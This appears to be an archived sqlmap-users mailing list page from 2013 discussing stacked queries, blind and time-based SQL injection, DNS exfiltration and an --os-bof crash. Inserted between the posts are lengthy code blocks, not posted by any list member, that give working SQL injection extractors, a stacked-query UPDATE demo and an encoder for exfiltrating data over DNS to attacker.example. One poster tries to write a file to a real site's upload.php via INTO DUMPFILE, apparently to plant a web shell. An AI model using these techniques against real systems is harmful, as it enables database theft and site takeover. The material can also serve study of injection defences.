sqlmap-users Mailing List for sqlmap (Page 41)
From: Miroslav S. <mir...@gm...> - 2013-02-20 14:12:37
p.s. 15 days ago there was no such warning for "INTO OUTFILE", but it also (silently) didn't work.

On Wed, Feb 20, 2013 at 3:11 PM, Miroslav Stampar <mir...@gm...> wrote:
> Do you see that warning: "execution of custom SQL queries is only
> available when stacked queries are supported"? Do you know what it
> means?
>
> I've said that you need stacking -> you need to have the "STACKED"
> technique available for exploitation. In your case that's not the case.
>
> Kind regards,
> Miroslav Stampar

--
Miroslav Stampar
http://about.me/stamparm
From: Andres R. <and...@gm...> - 2013-02-20 14:12:15
Miroslav,

On Wed, Feb 20, 2013 at 4:15 AM, Miroslav Stampar <mir...@gm...> wrote:
> Hi.
>
> In theory this works, in practice it doesn't. We already overturned 2-3
> guys proposing this. Today's pages are too dynamic (banners, promos, etc.).

But sqlmap already supports comparing pages with minor differences (using
difflib, correct?)

> Also, you would need a parameter value with a big covering range (lots of
> different values).

256 different rows for a table doesn't seem to be something difficult to
find; while not possible in all cases, I agree.

> Also, whoever wrote this doesn't have a clue about this subject: 'The
> attacker would then take a checksum of the returned html data'. This is
> being done in kiddish scripts. A real SQLi tool knows that a checksum is
> faaar from reliable.

See difflib above.

> Anyway, the answer is no.

I think you're disregarding a good idea (if correctly implemented it provides
an 8-times performance improvement) way too fast. Implementation is going to
be difficult, but the benefits are great.

> Kind regards,
> Miroslav Stampar
>
> On Feb 20, 2013 2:11 AM, "Julius Kivimäki" <jul...@gm...> wrote:
>> Should probably look into adding this,
>> http://www.blackhatlibrary.net/SQL_injection/Blind/Comparative_precomputation

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
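The technique the two of them are arguing about, as an added example that is neither sqlmap's code nor the blackhatlibrary article's: a constructed SQLite-backed endpoint with 256 product ids and a rotating banner, a classic bit-by-bit boolean-blind extractor (eight requests per byte), and a comparative-precomputation extractor (256 requests once, then one request per byte). Raw checksums of the page are unstable on the dynamic target, which is Miroslav's objection; cutting the dynamic region out first (a single-region simplification of what sqlmap does with difflib) makes the checksum usable again, which is Andrés's point. The secret, the product names, the promo strings and the `/item?id=` endpoint are all constructed for the example.

```python
import hashlib
import sqlite3

SECRET = "s3cret!"  # constructed: the value the blind injection will extract
PROMOS = ["Free shipping today", "Summer sale", "New arrivals"]  # rotating banner


class Target:
    """Constructed vulnerable endpoint: GET /item?id=<n> renders the product whose
    id equals the unsanitised parameter. dynamic=True appends a rotating banner,
    the 'banners, promos' case raised in the thread."""

    def __init__(self, dynamic=False):
        self.dynamic, self.requests = dynamic, 0
        self.db = sqlite3.connect(":memory:")
        self.db.executescript("CREATE TABLE products(id INTEGER, name TEXT);"
                              "CREATE TABLE secrets(value TEXT);")
        self.db.executemany("INSERT INTO products VALUES (?,?)",
                            [(i, f"product-{i}") for i in range(256)])
        self.db.execute("INSERT INTO secrets VALUES (?)", (SECRET,))

    def get(self, id_param):
        self.requests += 1
        row = self.db.execute(f"SELECT name FROM products WHERE id={id_param}").fetchone()
        page = f"<h1>Shop</h1><p>{row[0] if row else 'no such item'}</p>"
        if self.dynamic:
            page += f"<div class=promo>{PROMOS[self.requests % 3]}</div>"
        return page


def signature(page):
    """The 'checksum of the returned html' from the proposal."""
    return hashlib.sha256(page.encode()).hexdigest()


def learn_dynamic(t, k=8):
    """Fetch one page twice; whatever differs is dynamic. Return the k characters
    just before and after that region so it can be cut out of any later page.
    sqlmap does this with difflib and handles several regions; one is enough here."""
    a, b = t.get("1"), t.get("1")
    if a == b:
        return None
    pre = 0
    while pre < min(len(a), len(b)) and a[pre] == b[pre]:
        pre += 1
    suf = 0
    while suf < min(len(a), len(b)) - pre and a[-1 - suf] == b[-1 - suf]:
        suf += 1
    return a[max(0, pre - k):pre], a[len(a) - suf:len(a) - suf + k]


def strip_dynamic(page, markers):
    if not markers:
        return page
    pre, suf = markers
    s = page.find(pre)
    e = page.find(suf, s + len(pre)) if s >= 0 else -1
    return page if e < 0 else page[:s + len(pre)] + page[e:]


def byte_expr(i):
    """Injected subquery evaluating to the i-th byte (1-based) of the secret."""
    return f"(SELECT unicode(substr(value,{i},1)) FROM secrets)"


def bitwise_byte(t, markers, true_sig, i):
    """Classic boolean-blind: eight requests per byte, one per bit."""
    value = 0
    for bit in range(8):
        page = t.get(f"1 AND (({byte_expr(i)}>>{bit})&1)")
        if signature(strip_dynamic(page, markers)) == true_sig:
            value |= 1 << bit
    return value


def extract_bitwise(t, markers, length):
    true_sig = signature(strip_dynamic(t.get("1"), markers))
    return "".join(chr(bitwise_byte(t, markers, true_sig, i)) for i in range(1, length + 1))


def precompute(t, markers):
    """256 requests, once: checksum of the page each id renders. Ids whose pages
    collide are marked None so a lookup falls back instead of guessing."""
    table = {}
    for v in range(256):
        sig = signature(strip_dynamic(t.get(str(v)), markers))
        table[sig] = None if sig in table else v
    return table


def extract_precomputed(t, markers, table, length):
    """One request per byte: make the page render the row whose id is the byte
    value, then look its checksum up. Unknown or ambiguous pages fall back."""
    out, true_sig = "", None
    for i in range(1, length + 1):
        v = table.get(signature(strip_dynamic(t.get(byte_expr(i)), markers)))
        if v is None:
            if true_sig is None:
                true_sig = signature(strip_dynamic(t.get("1"), markers))
            v = bitwise_byte(t, markers, true_sig, i)
        out += chr(v)
    return out
```

Request counts make the trade-off visible: after the 256 precomputation requests (plus two for learning the dynamic region) every further byte costs one request instead of eight, so the table only pays for itself beyond roughly 36 bytes of output; for a short value the bit-wise path is cheaper. A byte whose page is not in the table, or whose page collides with another id's, falls back to the bit-wise path for that byte, which is where Andrés's "calibrate on the first few bytes with both algorithms" suggestion would slot in.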
From: Miroslav S. <mir...@gm...> - 2013-02-20 14:11:26
Do you see that warning: "execution of custom SQL queries is only available
when stacked queries are supported"? Do you know what it means?

I've said that you need stacking -> you need to have the "STACKED" technique
available for exploitation. In your case that's not the case.

Kind regards,
Miroslav Stampar

On Wed, Feb 20, 2013 at 3:05 PM, ml <ml...@sm...> wrote:
> On 2013-02-20 14:52, Miroslav Stampar wrote:
>> p.s. the problem is that INTO OUTFILE affects only the SELECT query where
>> it is supposed to be done. In your case you have one query which is
>> INJECTABLE and one separate CUSTOM query which needs to include INTO
>> OUTFILE -> this is a conflict which requires usage of stacking (or you
>> can try to exploit it manually using the original query)
>
> sql-shell> 1;select 0x3c*******e into dumpfile "/www/doc/www.**************.**cz/www/new/upload.php";
> [15:01:16] [WARNING] execution of custom SQL queries is only available
> when stacked queries are supported
>
> in the case of a concrete example I get this even with stacking

--
Miroslav Stampar
http://about.me/stamparm
From: ml <ml...@sm...> - 2013-02-20 14:06:06
On 2013-02-20 14:52, Miroslav Stampar wrote:
> p.s. the problem is that INTO OUTFILE affects only the SELECT query where
> it is supposed to be done. In your case you have one query which is
> INJECTABLE and one separate CUSTOM query which needs to include INTO
> OUTFILE -> this is a conflict which requires usage of stacking (or
> you can try to exploit it manually using the original query)

sql-shell> 1;select 0x3c*******e into dumpfile "/www/doc/www.**************.cz/www/new/upload.php";
[15:01:16] [WARNING] execution of custom SQL queries is only available when stacked queries are supported

In the case of a concrete example I get this even with stacking.

--
gpg --keyserver pgp.mit.edu --recv-key C2626742
http://about.me/fakessh
From: Miroslav S. <mir...@gm...> - 2013-02-20 13:52:10
p.s. the problem is that INTO OUTFILE affects only the SELECT query where it
is supposed to be done. In your case you have one query which is INJECTABLE
and one separate CUSTOM query which needs to include INTO OUTFILE -> this is
a conflict which requires usage of stacking (or you can try to exploit it
manually using the original query).

On Wed, Feb 20, 2013 at 2:48 PM, Miroslav Stampar <mir...@gm...> wrote:
> For using "INTO OUTFILE" in a specific SELECT query you need stacking (or
> you can try to exploit it manually). We can't help you here.
>
> Bye

--
Miroslav Stampar
http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2013-02-20 13:48:40
For using "INTO OUTFILE" in a specific SELECT query you need stacking (or you
can try to exploit it manually). We can't help you here.

Bye

On Wed, Feb 20, 2013 at 2:45 PM, ml <ml...@sm...> wrote:
> I tried an application style
>
> select 0x3a into outfile './test.txt'
>
> and that
>
> the shell answers an error
> custom queries are not available
>
> simple query style
> SELECT id FROM users works
>
> but when you add into dumpfile or outfile it does not work
>
> I tried putting 1; in front of the stack, no more successful
>
> there is a problem

--
Miroslav Stampar
http://about.me/stamparm
From: ml <ml...@sm...> - 2013-02-20 13:45:28
On 2013-02-20 09:53, Miroslav Stampar wrote:
> --sql-query WORKS (tested this moment with ERROR based-only technique
> using query "SELECT id FROM users")
> --sql-shell WORKS (tested this moment with ERROR based-only technique
> using query "SELECT id FROM users")
>
> To distinguish things a bit. A query is a SQL command that starts with
> "SELECT". Non-query statements (INSERT/UPDATE/DELETE...) require
> "stacking".
>
> You haven't stated what switch you have used, nor which
> query/non-query command you have tried, nor which techniques were
> available in your case... Nothing.

I tried an application style

select 0x3a into outfile './test.txt'

and that

the shell answers an error
custom queries are not available

simple query style
SELECT id FROM users works

but when you add into dumpfile or outfile it does not work

I tried putting 1; in front of the stack, no more successful

there is a problem

--
gpg --keyserver pgp.mit.edu --recv-key C2626742
http://about.me/fakessh
From: Miroslav S. <mir...@gm...> - 2013-02-20 08:53:48
--sql-query WORKS (tested this moment with ERROR based-only technique using
query "SELECT id FROM users")
--sql-shell WORKS (tested this moment with ERROR based-only technique using
query "SELECT id FROM users")

To distinguish things a bit. A query is a SQL command that starts with
"SELECT". Non-query statements (INSERT/UPDATE/DELETE...) require "stacking".

You haven't stated what switch you have used, nor which query/non-query
command you have tried, nor which techniques were available in your case...
Nothing.

On Tue, Feb 19, 2013 at 11:37 PM, ml <ml...@sm...> wrote:
> hello guru
>
> I ask you for a little help.
> all the "custom queries" are no longer possible
> to execute a custom query sqlmap answers that "stacked queries" are not
> supported.
>
> What does it imply that lines of code that executed 15 days ago do not
> work anymore?
>
> please provide a little help
>
> sincerely

--
Miroslav Stampar
http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2013-02-20 07:15:37
Hi.

In theory this works, in practice it doesn't. We already overturned 2-3 guys
proposing this. Today's pages are too dynamic (banners, promos, etc.). Also,
you would need a parameter value with a big covering range (lots of different
values).

Also, whoever wrote this doesn't have a clue about this subject: 'The attacker
would then take a checksum of the returned html data'. This is being done in
kiddish scripts. A real SQLi tool knows that a checksum is faaar from
reliable.

Anyway, the answer is no.

Kind regards,
Miroslav Stampar

On Feb 20, 2013 2:11 AM, "Julius Kivimäki" <jul...@gm...> wrote:
> Should probably look into adding this,
> http://www.blackhatlibrary.net/SQL_injection/Blind/Comparative_precomputation
From: Andres R. <and...@gm...> - 2013-02-20 03:07:44
Liked the idea, implementation might be rather difficult and might have many
errors. I would recommend "calibrating" the new comparative precomputation
algorithm and then extracting 10 bytes -or some other number- using both
algorithms (old and precomp). If they are the same, continue using precomp,
else fall back to the old/stable algorithm.

On Tue, Feb 19, 2013 at 10:10 PM, Julius Kivimäki <jul...@gm...> wrote:
> Should probably look into adding this,
> http://www.blackhatlibrary.net/SQL_injection/Blind/Comparative_precomputation

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
From: Julius K. <jul...@gm...> - 2013-02-20 01:10:47
Should probably look into adding this,
http://www.blackhatlibrary.net/SQL_injection/Blind/Comparative_precomputation
From: Andres R. <and...@gm...> - 2013-02-19 23:35:30
Regression alert! Regression alert! sqlmap needs more unittests :)

On Tue, Feb 19, 2013 at 7:37 PM, ml <ml...@sm...> wrote:
> hello guru
>
> I ask you for a little help.
> all the "custom queries" are no longer possible
> to execute a custom query sqlmap answers that "stacked queries" are not
> supported.
>
> What does it imply that lines of code that executed 15 days ago do not
> work anymore?

--
Andrés Riancho
Project Leader at w3af - http://w3af.org/
Web Application Attack and Audit Framework
Twitter: @w3af
GPG: 0x93C344F3
From: ml <ml...@sm...> - 2013-02-19 22:37:21
hello guru

I ask you for a little help.
all the "custom queries" are no longer possible
to execute a custom query sqlmap answers that "stacked queries" are not
supported.

What does it imply that lines of code that executed 15 days ago do not work
anymore?

please provide a little help

sincerely
--
gpg --keyserver pgp.mit.edu --recv-key C2626742
http://about.me/fakessh
From: Leon J. <leo...@gm...> - 2013-02-18 11:32:04
On Monday, February 18, 2013, Bernardo Damele A. G. wrote:
>
> --technique T to force only time-based SQL injection. Refer to the
> user's manual for further details on the --technique switch.

Apologies. It is technique, not type :)

--
Regards
L.

Sent using electronic mail ツ
From: Bernardo D. A. G. <ber...@gm...> - 2013-02-18 09:56:07
|
Hi Bruno,

On 18 February 2013 00:03, Bruno Garcia <gar...@gm...> wrote:
> Also, it shows that it detected two injections, and it's using the first one
> for doing the queries, is there anyway I could test the queries with the
> second injection?

--technique T to force only time-based SQL injection. Refer to the
user's manual for further details on --technique switch.

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949) |
From: Miroslav S. <mir...@gm...> - 2013-02-18 08:17:45
|
Hi.

It's very simple. If stacking of queries is not supported (e.g. id=1;UPDATE..) then you can't use non-query SQL statements. Pretty simple.

Bye

On 18.2.2013 01:04 "Bruno Garcia" <gar...@gm...> wrote:
> Hello,
>
> I have this injection:
>
> Place: POST
> Parameter: xxxxx
> Type: boolean-based blind
> Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
> clause (RLIKE)
> Payload: xxx=xxxx&xxxx=test' RLIKE IF(8894=8894,0x4d7953514c,0x28) AND
> 'qGgA'='qGgA
> Vector: RLIKE IF([INFERENCE],[ORIGVALUE],0x28)
>
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 OR time-based blind
> Payload: tipo=xxxxx&xxxxx=-1188' OR 7506=SLEEP(5) AND 'lBGC'='lBGC
> Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
>
> and I get this when using UPDATE
>
> [WARNING] execution of custom SQL queries is only available when stacked
> queries are supported.
>
> Is there any workaround for this?
> Also, it shows that it detected two injections, and it's using the first
> one for doing the queries, is there anyway I could test the queries with
> the second injection?
>
> Thanks |
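The distinction Miroslav draws above (inference works inside the application's own SELECT, an UPDATE only runs if the DB layer executes a second statement) can be shown offline. The following is an added example written for this thread; it is not sqlmap's code and was not posted by anyone on the list. It uses Python's sqlite3 module, whose execute() runs exactly one statement per call while executescript() runs every statement in the string, to stand in for a non-stacking and a stacking DB layer. The users table, the role column and the two lookup functions are made up for the demonstration.

```python
"""Why sqlmap's custom-query mode needs stacked queries.

Added example for this thread; it is not sqlmap code and not code posted
by anyone on the list. An in-memory SQLite database models the situation
Bruno describes: the injection point sits inside the application's SELECT,
so a payload that stays inside that SELECT (boolean-based inference) works,
but an UPDATE can only run if the application's database call executes more
than one statement per request ("stacking"). The users table and the two
lookup functions are made up for the demo.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, name TEXT, role TEXT)")
    con.execute("INSERT INTO users VALUES (1, 'alice', 'user')")
    con.commit()
    return con


def lookup_single(con: sqlite3.Connection, user_input: str) -> list:
    """Vulnerable lookup (string concatenation) on a DB API that runs exactly
    one statement per call. sqlite3's execute() refuses a second statement,
    the same way e.g. PHP's classic mysql_query() does for MySQL."""
    sql = "SELECT name FROM users WHERE id = " + user_input
    return con.execute(sql).fetchall()


def lookup_stacked(con: sqlite3.Connection, user_input: str) -> None:
    """Same vulnerable concatenation on a DB API that runs every statement
    in the string (stacking), as MSSQL drivers or mysqli_multi_query() do."""
    sql = "SELECT name FROM users WHERE id = " + user_input
    con.executescript(sql)  # result rows are discarded, side effects remain


def role_of(con: sqlite3.Connection, uid: int = 1) -> str:
    return con.execute("SELECT role FROM users WHERE id = ?", (uid,)).fetchone()[0]


def boolean_blind_probe(con: sqlite3.Connection, condition: str) -> bool:
    """Inference needs no stacking: the condition is ANDed into the original
    SELECT and the attacker watches whether the row still comes back."""
    return len(lookup_single(con, "1 AND (" + condition + ")")) == 1


def update_without_stacking(con: sqlite3.Connection) -> str:
    """The 'id=1;UPDATE..' payload against the single-statement API."""
    try:
        lookup_single(con, "1; UPDATE users SET role = 'admin' WHERE id = 1")
        return "executed"
    except (sqlite3.Warning, sqlite3.ProgrammingError) as exc:
        # sqlite3 raises "You can only execute one statement at a time."
        # before running anything, so the UPDATE never reaches the engine.
        return "rejected: " + str(exc)


def update_with_stacking(con: sqlite3.Connection) -> str:
    """The same payload where the DB layer stacks statements: role changes."""
    lookup_stacked(con, "1; UPDATE users SET role = 'admin' WHERE id = 1")
    return role_of(con)


if __name__ == "__main__":
    db = make_db()
    print("first letter of role is 'u':", boolean_blind_probe(
        db, "substr((SELECT role FROM users WHERE id = 1), 1, 1) = 'u'"))
    print(update_without_stacking(db), "-> role:", role_of(db))
    print("with stacking -> role:", update_with_stacking(db))
```

The boolean probe is what sqlmap's boolean-based and time-based techniques build on, and it never leaves the original SELECT; the UPDATE needs the second, separately parsed statement, which is exactly what the "stacked queries" warning is about.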
From: Leon J. <leo...@gm...> - 2013-02-18 08:03:56
|
On Monday, February 18, 2013, Bruno Garcia wrote:
> Hello,
>
> I have this injection:
>
> Place: POST
> Parameter: xxxxx
> Type: boolean-based blind
> Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY
> clause (RLIKE)
> Payload: xxx=xxxx&xxxx=test' RLIKE IF(8894=8894,0x4d7953514c,0x28) AND
> 'qGgA'='qGgA
> Vector: RLIKE IF([INFERENCE],[ORIGVALUE],0x28)
>
> Type: AND/OR time-based blind
> Title: MySQL > 5.0.11 OR time-based blind
> Payload: tipo=xxxxx&xxxxx=-1188' OR 7506=SLEEP(5) AND 'lBGC'='lBGC
> Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
>
> and I get this when using UPDATE
>
> [WARNING] execution of custom SQL queries is only available when stacked
> queries are supported.
>
> Is there any workaround for this?
> Also, it shows that it detected two injections, and it's using the first
> one for doing the queries, is there anyway I could test the queries with
> the second injection?
>

Hello,

I am not at a computer now, so this is out of my head.

If you want to test a specific parameter, use -p parameter_name; if you want to use a specific injection type that was detected, use --type=E as an example for error based injection.

--
Regards
L.
Sent using electronic mail ツ |
From: Bruno G. <gar...@gm...> - 2013-02-18 00:03:47
|
Hello,

I have this injection:

Place: POST
Parameter: xxxxx
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: xxx=xxxx&xxxx=test' RLIKE IF(8894=8894,0x4d7953514c,0x28) AND 'qGgA'='qGgA
Vector: RLIKE IF([INFERENCE],[ORIGVALUE],0x28)

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: tipo=xxxxx&xxxxx=-1188' OR 7506=SLEEP(5) AND 'lBGC'='lBGC
Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

and I get this when using UPDATE

[WARNING] execution of custom SQL queries is only available when stacked queries are supported.

Is there any workaround for this?
Also, it shows that it detected two injections, and it's using the first one for doing the queries, is there anyway I could test the queries with the second injection?

Thanks |
From: Miroslav S. <mir...@gm...> - 2013-02-15 08:55:48
|
Hi.

Thank you for your report. Find it fixed now [1].

Bye

[1] https://github.com/sqlmapproject/sqlmap/commit/5d068896a95fa61d1bfbb4263a10701764d45091

On Fri, Feb 15, 2013 at 9:38 AM, joyal 8x <jo...@gm...> wrote:
> sqlmap version: 1.0-dev-87db5d0
> Python version: 2.6.5
> Operating system: posix
> Command line: ./sqlmap.py -u ********************************************* --data=zipcode=1 -p zipcode --tmp-path=C:/Windows/Temp/ --os-bof
> Technique: STACKED
> Back-end DBMS: Microsoft SQL Server (fingerprinted)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 87, in main
>     start()
>   File "/pentest/database/sqlmap/lib/controller/controller.py", line 572, in start
>     action()
>   File "/pentest/database/sqlmap/lib/controller/action.py", line 169, in action
>     conf.dbmsHandler.osBof()
>   File "/pentest/database/sqlmap/plugins/generic/takeover.py", line 353, in osBof
>     self.bof()
>   File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 656, in bof
>     debugMsg += "with return code %s" % self._controlMsfCmd(self._msfCliProc, self.spHeapOverflow)
>   File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 508, in _controlMsfCmd
>     func()
>   File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/takeover.py", line 138, in spHeapOverflow
>     """ % (addrs[0], addrs[1], addrs[2], addrs[3], addrs[4], addrs[5], addrs[6], addrs[7], shellcodeChar)
> IndexError: string index out of range
>
> [*] shutting down at 14:29:28
>
> Exception AttributeError: "'NoneType' object has no attribute 'error'" in <bound method Popen.__del__ of <lib.core.subprocessng.Popen object at 0x8ab0d4c>> ignored
>
> --
> joyal8x

--
Miroslav Stampar
http://about.me/stamparm |
From: joyal 8x <jo...@gm...> - 2013-02-15 08:38:36
|
sqlmap version: 1.0-dev-87db5d0
Python version: 2.6.5
Operating system: posix
Command line: ./sqlmap.py -u ********************************************* --data=zipcode=1 -p zipcode --tmp-path=C:/Windows/Temp/ --os-bof
Technique: STACKED
Back-end DBMS: Microsoft SQL Server (fingerprinted)
Traceback (most recent call last):
  File "./sqlmap.py", line 87, in main
    start()
  File "/pentest/database/sqlmap/lib/controller/controller.py", line 572, in start
    action()
  File "/pentest/database/sqlmap/lib/controller/action.py", line 169, in action
    conf.dbmsHandler.osBof()
  File "/pentest/database/sqlmap/plugins/generic/takeover.py", line 353, in osBof
    self.bof()
  File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 656, in bof
    debugMsg += "with return code %s" % self._controlMsfCmd(self._msfCliProc, self.spHeapOverflow)
  File "/pentest/database/sqlmap/lib/takeover/metasploit.py", line 508, in _controlMsfCmd
    func()
  File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/takeover.py", line 138, in spHeapOverflow
    """ % (addrs[0], addrs[1], addrs[2], addrs[3], addrs[4], addrs[5], addrs[6], addrs[7], shellcodeChar)
IndexError: string index out of range

[*] shutting down at 14:29:28

Exception AttributeError: "'NoneType' object has no attribute 'error'" in <bound method Popen.__del__ of <lib.core.subprocessng.Popen object at 0x8ab0d4c>> ignored

--
joyal8x |
From: Bernardo D. A. G. <ber...@gm...> - 2013-02-13 10:03:31
|
Hi,

On 13 February 2013 09:56, Владимир Мартьянов <vil...@gm...> wrote:
>>
>> Morale of story goes like this. Time-based injections are fragile and you'll need to have LOTS of patience with those.
>>
> I know... But if it's the only one way I have no choice.

Have you considered giving a go to --dns-domain to verify whether or not you could exfiltrate data out-of-band via DNS requests? This has been implemented in sqlmap in mid 2012 and is documented by Miroslav here[1] and here[2].

[1] http://www.slideshare.net/stamparm/dns-exfiltration-using-sqlmap-13163281
[2] http://www.slideshare.net/stamparm/ph-days-2012miroslavstampardataretrievaloverdnsinsqlinjectionattackspaper

--
Bernardo Damele A. G.
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949) |
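Whatever the DBMS primitive used to trigger the lookup (the injected query has to make the database server resolve a hostname that the attacker's name server sees), the channel only works because the retrieved value is squeezed into DNS labels under their length limits. The following is an added example written for this thread, not sqlmap's --dns-domain implementation and not taken from the slides above; it shows the encoding side (hex so the data survives case folding, 63-octet labels, a sequence label per query so reordering and resolver retries do not corrupt the value) and the reassembly side. The zone attacker.example and the chunk layout are assumptions made for the demo; no DNS traffic is sent.

```python
"""Packing exfiltrated data into DNS names and reassembling it.

Added example for this thread; it is not sqlmap's --dns-domain code and was
not posted on the list. encode() yields the hostnames the DBMS would be made
to resolve, one per query; decode() is what the attacker's authoritative
name server does with the names it sees. The zone name and the layout
(sequence label first, then up to three payload labels, then the zone) are
assumptions for this demo.
"""
import binascii

MAX_LABEL = 63    # RFC 1035: a label is at most 63 octets
MAX_NAME = 253    # longest textual FQDN that fits the 255-octet wire limit


def hex_capacity(zone: str, labels_per_name: int) -> int:
    """Hex characters one query name can carry: a sequence label of up to
    five digits, the dots and the attacker zone are overhead, the rest is
    payload, rounded down so every name carries whole bytes."""
    overhead = 5 + (labels_per_name + 1) + len(zone)
    payload = min(labels_per_name * MAX_LABEL, MAX_NAME - overhead)
    if payload < 2:
        raise ValueError("zone too long to carry any data")
    return payload - (payload % 2)


def encode(data: bytes, zone: str, labels_per_name: int = 3) -> list:
    """Return the hostnames to resolve, in order, each tagged with its
    sequence number so the receiver can tolerate reordering."""
    hexed = binascii.hexlify(data).decode("ascii")   # only [0-9a-f]: case-safe
    per_name = hex_capacity(zone, labels_per_name)
    names = []
    for seq, start in enumerate(range(0, len(hexed), per_name)):
        chunk = hexed[start:start + per_name]
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        names.append(".".join([str(seq)] + labels + [zone]))
    return names


def decode(observed_names, zone: str) -> bytes:
    """Reassemble from the names a name server for `zone` observed.
    Duplicates (resolver retries), reordering and case changes (0x20
    randomisation) are all absorbed; names outside the zone are ignored."""
    suffix = "." + zone.lower()
    chunks = {}
    for name in observed_names:
        name = name.lower().rstrip(".")
        if not name.endswith(suffix):
            continue                                   # unrelated query
        labels = name[:-len(suffix)].split(".")
        try:
            seq = int(labels[0])
        except ValueError:
            continue                                   # not one of ours
        chunks[seq] = "".join(labels[1:])              # a retry carries the same data
    hexed = "".join(chunks[seq] for seq in sorted(chunks))
    return binascii.unhexlify(hexed)


if __name__ == "__main__":
    # constructed sample: a MySQL-style user:hash line repeated to span several queries
    sample = b"root:*A4B6157319038724E3560894F7F932C8886EBFCF;" * 5
    queries = encode(sample, "attacker.example")
    for q in queries:
        print(len(q), q)
    print(decode(reversed(queries), "attacker.example") == sample)
```

Hex rather than base64 is the usual choice because DNS names are case-insensitive and some resolvers randomise label case; the sequence label costs a few characters per query but is what makes the channel survive retries and out-of-order delivery.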
From: Владимир М. <vil...@gm...> - 2013-02-13 09:57:00
|
On 2013/2/13 Miroslav Stampar <mir...@gm...> wrote:
> This means basically this. If you know that columns for table users in
> database testdb were invalid, just run this one time:
>
> --fresh-queries -T users -D testdb --columns
>
> That way you'll "refresh" session file with new entries containing this
> time valid data
>

Will try it! Thank you!

> Morale of story goes like this. Time-based injections are fragile and
> you'll need to have LOTS of patience with those.
>

I know... But if it's the only one way I have no choice. |
From: Miroslav S. <mir...@gm...> - 2013-02-13 09:54:44
|
This means basically this. If you know that columns for table users in database testdb were invalid, just run this one time:

--fresh-queries -T users -D testdb --columns

That way you'll "refresh" session file with new entries containing this time valid data

Morale of story goes like this. Time-based injections are fragile and you'll need to have LOTS of patience with those.

Kind regards,
Miroslav Stampar

On Wed, Feb 13, 2013 at 10:50 AM, Владимир Мартьянов <vil...@gm...> wrote:
>
>
> On 2013/2/13 Miroslav Stampar <mir...@gm...> wrote:
>
>> all data again (excluding SQLi detection), but it won't invalidate
>> previous data in session file (like --flush-session).
>>
>
> OK, Thank you!
>

--
Miroslav Stampar
http://about.me/stamparm |
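The fragility Miroslav mentions has a concrete mechanism: in a time-based blind channel the only observable is the response time, so any late reply from a loaded server or congested link is indistinguishable from a real SLEEP(), and every misread bit lands in the session file as a wrong character. The following added example, not sqlmap's inference code and not from the thread, simulates that. A SimulatedTarget answers bit-at-a-time questions about a secret with a delay and, as a stand-in for a loaded server, deterministically stalls every fifth request (an assumption chosen so the run is reproducible). The "patience" is then the extra requests spent re-checking slow answers: a query that really sleeps can never come back early, while a query that does not sleep can still come back late, so a bit is taken as 1 only when every repetition was slow. That re-check rule is this example's choice, not a description of what sqlmap does.

```python
"""Why time-based blind extraction is fragile, and what patience buys.

Added example for this thread; it is neither sqlmap's inference code nor
anything posted on the list. SimulatedTarget stands in for the vulnerable
application: each request corresponds to a payload of the shape
IF(<bit of secret char at pos> = 1, SLEEP(delay), 0) and the only thing
the attacker sees is the response time. To model a loaded server the
simulation stalls every `stall_every`-th request; that deterministic
pattern is an assumption made so the outcome is reproducible.
"""


class SimulatedTarget:
    """Answers "is bit `bit` of secret[pos] set?" purely through latency."""

    def __init__(self, secret: str, delay: float = 5.0, stall_every: int = 5):
        self.secret = secret
        self.delay = delay            # the SLEEP() argument in the payload
        self.stall_every = stall_every
        self.requests = 0             # cost counter for the attacker

    def response_time(self, pos: int, bit: int) -> float:
        self.requests += 1
        truly_set = (ord(self.secret[pos]) >> bit) & 1 == 1
        seconds = self.delay if truly_set else 0.2          # SLEEP vs normal page
        if self.requests % self.stall_every == 0:            # server hiccup: late reply
            seconds += self.delay
        return seconds


def extract(target: SimulatedTarget, length: int, confirmations: int = 1) -> str:
    """Recover `length` 7-bit characters. With confirmations=1 every bit is
    decided from one measurement. With confirmations>1 a slow answer is
    re-requested and the bit is 1 only if *every* repetition was slow; a
    fast answer is trusted immediately, because a real SLEEP() cannot return
    early. More confirmations means more requests, which is the patience."""
    threshold = target.delay
    out = []
    for pos in range(length):
        code = 0
        for bit in range(7):
            slow = all(target.response_time(pos, bit) >= threshold
                       for _ in range(confirmations))
            if slow:
                code |= 1 << bit
        out.append(chr(code))
    return "".join(out)


def compare(secret: str = "root") -> dict:
    """Run the single-measurement and the re-checking strategy side by side
    and report what each recovered and how many requests it cost."""
    results = {}
    for n in (1, 2):
        t = SimulatedTarget(secret)
        results[n] = {"value": extract(t, len(secret), n), "requests": t.requests}
    return results


if __name__ == "__main__":
    for n, r in compare().items():
        print(f"confirmations={n}: got {r['value']!r} after {r['requests']} requests")
```

In the run above the single-measurement pass returns a corrupted string (one stalled reply flips a 0 bit to 1), which is exactly the kind of wrong entry --fresh-queries exists to overwrite; the re-checking pass recovers the secret at the price of more requests.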
